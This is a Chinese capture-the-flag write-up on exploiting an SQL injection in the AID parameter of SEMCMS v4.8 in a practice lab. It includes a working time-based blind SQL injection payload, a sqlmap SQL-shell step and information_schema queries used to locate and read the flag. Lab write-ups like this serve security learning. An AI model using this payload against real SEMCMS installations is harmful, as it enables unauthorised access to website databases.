靶场介绍
SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在SQLI,该漏洞源于SEMCMS_Function.php 中的 AID 参数包含 SQL 注入。
开启靶场
搜索POC
寻找漏洞点
下面看看要会员,共享自己的成果理应得到回报,至少他还给给我看了一点点
很明显是后台sql注入,因为存在管理入口,那就直接重装
重装完成后,可以看到登录入口
登录后台成功,挨个点功能,然后搜索他的参数:?Class=Shjia
因为这个参数比较特殊,不是什么英文,最后找到了才发现是上架的意思。
sql注入
随机点击一个商品上架,bp抓包
Payload:
languageID=1&AID[]=8) AND (SELECT 6149 FROM (SELECT(SLEEP(5)))pMLn) AND (1646=1646
获取flag
#sqlmap --sql-shell
# 先搜索flag在哪个表里,排序是因为已经知道是这个了
SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM information_schema.COLUMNS WHERE COLUMN_NAME = 'flag' limit 2,1
#再搜索flag
select flag from flllaaaag
总结
1、开始以为是前台漏洞,通过靶场的提示也找到了这个路径,只是参数是ID,最后怎么测试都不行,浪费了时间。
2、看到资料可能是后台漏洞,就寻找后台。爆破后台也没有爆破出来,都是404
3、输入重装的数据库和用户名密码,总是提示错误,最后又重新想了想进入了后台,进入后台就快多了。
参考文献
1、https://blog.csdn.net/qq_41904294/article/details/135389792